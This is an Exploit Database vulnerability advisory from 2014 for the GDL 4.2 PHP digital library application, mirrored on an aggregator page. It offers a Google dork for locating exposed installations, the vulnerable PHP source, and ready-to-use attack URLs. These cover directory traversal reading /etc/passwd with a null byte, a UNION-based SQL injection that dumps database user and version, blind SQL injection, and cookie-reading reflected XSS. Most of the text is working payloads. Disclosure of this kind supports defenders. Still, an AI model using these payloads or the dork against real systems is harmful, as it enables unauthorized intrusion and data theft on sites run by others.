GDL 4.2 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： ByEge
  日期： 2014-02-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31961/

• -> Title: GDL 4.2 Multiple Vulnerabilities
  
  -> Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip
  
  -> Author : ByEge
  
  -> Home : http://byege.blogspot.com.tr/
  
  -> Tested : Apache/2.2.22 (Win32) PHP/5.4.3
  
  -> Date : 26/02/2014
  
  -> Google Dork: "Powered by GDL 4.2"And "gdl.php?mod=browse"
  
  -> Thanks : F0RTYS3V3N- Cyb3rking - ameN
  
  -> Keyfi: http://www.youtube.com/watch?v=wKGMk56zSPI --> Yaz dostum boşa geçmiş ömre yaşam denir mi ?
  
  -> Not: Kendini geliştirmek isteyen arkadaşlar kod analizi için kullanabilirsiniz scripti, bir çok güvenlik zaafiyeti var.
  
  
  ###################################
  #Directory traversal vulnerability#
  ###################################
  http://localhost/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
  http://localhost/index.php?newlang=../../../../../../../../../../etc/passwd%00
  Line : gdl42/class/session.php 96 - 99parameter : newlang
  
  
  		// Setting bahasa
  		$lang = $_COOKIE['gdl_lang'];
  		$newlang = $_GET['newlang'];
  		
  		if (isset($newlang)) {
  			if (file_exists("./lang/$newlang.php")) {
  				setcookie("gdl_lang",$newlang,time()+($gdl_sys['page_caching'] * 60));
  				$gdl_content->language=$newlang;
  			} else {
  				setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
  				$gdl_content->language=$gdl_sys['language'];
  			}
  			
  		} elseif (isset($lang)) {
  			$gdl_content->language=$lang;
  		}else{
  			setcookie("gdl_lang",$gdl_sys['language'],time()+($gdl_sys['page_caching'] * 60));
  			$gdl_content->language=$gdl_sys['language'];
  		}
  	}
  		
  	function set_theme(){
  		global $gdl_content, $gdl_sys;
  --------------------------------------------------------------------------------------------------------------
  --------------------------------------------------------------------------------------------------------------
  http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
  http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00
  Line : gdl42/class/session.php120 - 123parameter : newtheme
  
  		$theme = $_COOKIE['gdl_theme'];
  		$newtheme = $_GET['newtheme'];
  		
  		if (isset($newtheme)) {
  			if (file_exists("./theme/$newtheme/theme.php")) {
  				setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));
  				$gdl_content->theme=$newtheme;
  			} else {
  				setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
  				$gdl_content->theme=$gdl_sys['theme'];
  			}
  			
  		} elseif (isset($theme)) {
  			$gdl_content->theme=$theme;
  		}else{
  			setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
  			$gdl_content->theme=$gdl_sys['theme'];
  		}
  
  	}
  	
  	function login($userid,$password) {
  		global $gdl_auth,$gdl_sys;
  --------------------------------------------------------------------------------------------------------------
  --------------------------------------------------------------------------------------------------------------
  #############################
  #SQL Injection vulnerability#
  #############################
  http://localhost/download.php?id=injecthere
  Line : gdl42/download.php18 - 24parameter : id
  
  $file_id = $_GET['id'];
  
  function download_redirect(){
  	
  	global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;
  	
  	$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");
  	$file_target=@mysql_result($dbres,0,"path");
  	$file_part=@mysql_result($dbres,0,"part");
  	$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));
  
  --------------------------------------------------------------------------------------------------------------
  --------------------------------------------------------------------------------------------------------------
  ###################################
  #Blind SQL Injection vulnerability#
  ###################################
  http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere
  Line : gdl42/main.php 119parameter : id
  if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))
  --------------------------------------------------------------------------------------------------------------
  --------------------------------------------------------------------------------------------------------------
  ########################################
  #Cross site scripting xss vulnerability#
  ########################################
  http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
  Line : module/search/function.php 38 parameter : keyword
  
  ###############################################################################################################################################################################
  ###############################################################################################################################################################################
  
  Test Vulnerability :
  http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--
  http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
  http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
  http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK